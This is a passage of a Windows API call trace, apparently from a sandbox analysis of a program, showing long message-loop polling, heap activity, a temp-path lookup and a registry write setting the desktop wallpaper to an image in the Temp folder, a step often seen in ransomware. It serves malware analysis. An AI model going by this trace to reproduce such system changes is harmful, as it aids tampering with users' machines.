wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.637] Sleep (dwMilliseconds=0xa) [0314.652] timeGetTime () returned 0x4e898 [0314.652] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.652] Sleep (dwMilliseconds=0xa) [0314.668] timeGetTime () returned 0x4e8a8 [0314.668] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.668] Sleep (dwMilliseconds=0xa) [0314.684] timeGetTime () returned 0x4e8b7 [0314.684] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.684] Sleep (dwMilliseconds=0xa) [0314.699] timeGetTime () returned 0x4e8c7 [0314.699] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.699] Sleep (dwMilliseconds=0xa) [0314.715] timeGetTime () returned 0x4e8d7 [0314.715] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.715] Sleep (dwMilliseconds=0xa) [0314.738] timeGetTime () returned 0x4e8e6 [0314.738] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.738] Sleep (dwMilliseconds=0xa) [0314.746] timeGetTime () returned 0x4e8f6 [0314.746] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.746] Sleep (dwMilliseconds=0xa) [0314.764] timeGetTime () returned 0x4e905 [0314.764] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.764] Sleep (dwMilliseconds=0xa) [0314.777] timeGetTime () returned 0x4e915 [0314.777] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.777] Sleep (dwMilliseconds=0xa) [0314.793] timeGetTime () returned 0x4e925 [0314.793] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.793] Sleep (dwMilliseconds=0xa) [0314.808] timeGetTime () returned 0x4e934 [0314.809] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.809] Sleep (dwMilliseconds=0xa) [0314.824] timeGetTime () returned 0x4e944 [0314.824] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.824] Sleep (dwMilliseconds=0xa) [0314.840] timeGetTime () returned 0x4e953 [0314.840] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.840] Sleep (dwMilliseconds=0xa) [0314.855] timeGetTime () returned 0x4e963 [0314.855] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.855] Sleep (dwMilliseconds=0xa) [0314.871] timeGetTime () returned 0x4e973 [0314.871] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.871] Sleep (dwMilliseconds=0xa) [0314.886] timeGetTime () returned 0x4e982 [0314.886] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.886] Sleep (dwMilliseconds=0xa) [0314.902] timeGetTime () returned 0x4e992 [0314.902] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.902] Sleep (dwMilliseconds=0xa) [0314.918] timeGetTime () returned 0x4e9a1 [0314.918] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.918] Sleep (dwMilliseconds=0xa) [0314.933] timeGetTime () returned 0x4e9b1 [0314.933] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.933] Sleep (dwMilliseconds=0xa) [0314.949] timeGetTime () returned 0x4e9c1 [0314.949] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.949] Sleep (dwMilliseconds=0xa) [0314.968] timeGetTime () returned 0x4e9d0 [0314.969] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.969] Sleep (dwMilliseconds=0xa) [0314.980] timeGetTime () returned 0x4e9e0 [0314.980] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.980] Sleep (dwMilliseconds=0xa) [0314.996] timeGetTime () returned 0x4e9ef [0314.996] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.996] Sleep (dwMilliseconds=0xa) [0315.012] timeGetTime () returned 0x4e9ff [0315.012] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.012] Sleep (dwMilliseconds=0xa) [0315.027] timeGetTime () returned 0x4ea0f [0315.027] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.027] Sleep (dwMilliseconds=0xa) [0315.042] timeGetTime () returned 0x4ea1e [0315.042] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.042] Sleep (dwMilliseconds=0xa) [0315.058] timeGetTime () returned 0x4ea2e [0315.058] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.058] Sleep (dwMilliseconds=0xa) [0315.074] timeGetTime () returned 0x4ea3d [0315.074] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.074] Sleep (dwMilliseconds=0xa) [0315.089] timeGetTime () returned 0x4ea4d [0315.089] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.089] Sleep (dwMilliseconds=0xa) [0315.105] timeGetTime () returned 0x4ea5d [0315.105] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.105] Sleep (dwMilliseconds=0xa) [0315.121] timeGetTime () returned 0x4ea6c [0315.121] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.121] Sleep (dwMilliseconds=0xa) [0315.136] timeGetTime () returned 0x4ea7c [0315.136] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.136] Sleep (dwMilliseconds=0xa) [0315.154] timeGetTime () returned 0x4ea8b [0315.155] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.155] Sleep (dwMilliseconds=0xa) [0315.167] timeGetTime () returned 0x4ea9b [0315.167] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.167] Sleep (dwMilliseconds=0xa) [0315.183] timeGetTime () returned 0x4eaab [0315.183] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.183] Sleep (dwMilliseconds=0xa) [0315.198] timeGetTime () returned 0x4eaba [0315.198] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.198] Sleep (dwMilliseconds=0xa) [0315.214] timeGetTime () returned 0x4eaca [0315.214] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.214] Sleep (dwMilliseconds=0xa) [0315.230] timeGetTime () returned 0x4ead9 [0315.230] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.230] Sleep (dwMilliseconds=0xa) [0315.245] timeGetTime () returned 0x4eae9 [0315.245] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.245] Sleep (dwMilliseconds=0xa) [0315.261] timeGetTime () returned 0x4eaf9 [0315.261] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.261] Sleep (dwMilliseconds=0xa) [0315.276] timeGetTime () returned 0x4eb08 [0315.276] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.276] Sleep (dwMilliseconds=0xa) [0315.292] timeGetTime () returned 0x4eb18 [0315.292] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.293] Sleep (dwMilliseconds=0xa) [0315.308] timeGetTime () returned 0x4eb27 [0315.308] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.308] Sleep (dwMilliseconds=0xa) [0315.323] timeGetTime () returned 0x4eb37 [0315.323] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0315.323] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0315.323] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0315.323] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0315.323] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0315.324] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.324] Sleep (dwMilliseconds=0xa) [0315.339] timeGetTime () returned 0x4eb47 [0315.339] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.339] Sleep (dwMilliseconds=0xa) [0315.354] timeGetTime () returned 0x4eb56 [0315.354] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.354] Sleep (dwMilliseconds=0xa) [0315.370] timeGetTime () returned 0x4eb66 [0315.370] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.370] Sleep (dwMilliseconds=0xa) [0315.386] timeGetTime () returned 0x4eb75 [0315.386] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.386] Sleep (dwMilliseconds=0xa) [0315.401] timeGetTime () returned 0x4eb85 [0315.401] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.401] Sleep (dwMilliseconds=0xa) [0315.417] timeGetTime () returned 0x4eb95 [0315.417] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.417] Sleep (dwMilliseconds=0xa) [0315.433] timeGetTime () returned 0x4eba4 [0315.433] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.433] Sleep (dwMilliseconds=0xa) [0315.448] timeGetTime () returned 0x4ebb4 [0315.448] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.448] Sleep (dwMilliseconds=0xa) [0315.464] timeGetTime () returned 0x4ebc3 [0315.464] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.464] Sleep (dwMilliseconds=0xa) [0315.480] timeGetTime () returned 0x4ebd3 [0315.480] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.480] Sleep (dwMilliseconds=0xa) [0315.495] timeGetTime () returned 0x4ebe3 [0315.495] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.495] Sleep (dwMilliseconds=0xa) [0315.510] timeGetTime () returned 0x4ebf2 [0315.510] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.510] Sleep (dwMilliseconds=0xa) [0315.526] timeGetTime () returned 0x4ec02 [0315.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0315.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0315.526] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0315.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0315.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0315.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0315.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0315.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0315.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0315.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0315.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0315.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0315.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0315.527] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0315.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0315.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0315.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0315.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0315.528] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0315.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0315.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0315.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0315.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0315.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0315.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0315.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0315.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0315.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0315.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0315.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0315.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0315.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0315.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0315.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0315.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0315.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0315.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0315.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0315.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0315.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0315.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0315.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0315.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0315.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0315.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0315.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0315.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0315.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0315.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0315.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0315.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0315.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0315.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0315.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0315.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0315.530] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0315.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0315.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0315.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0315.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0315.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0315.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0315.530] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0315.530] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0315.530] RegCloseKey (hKey=0x294) returned 0x0 [0315.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0315.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: 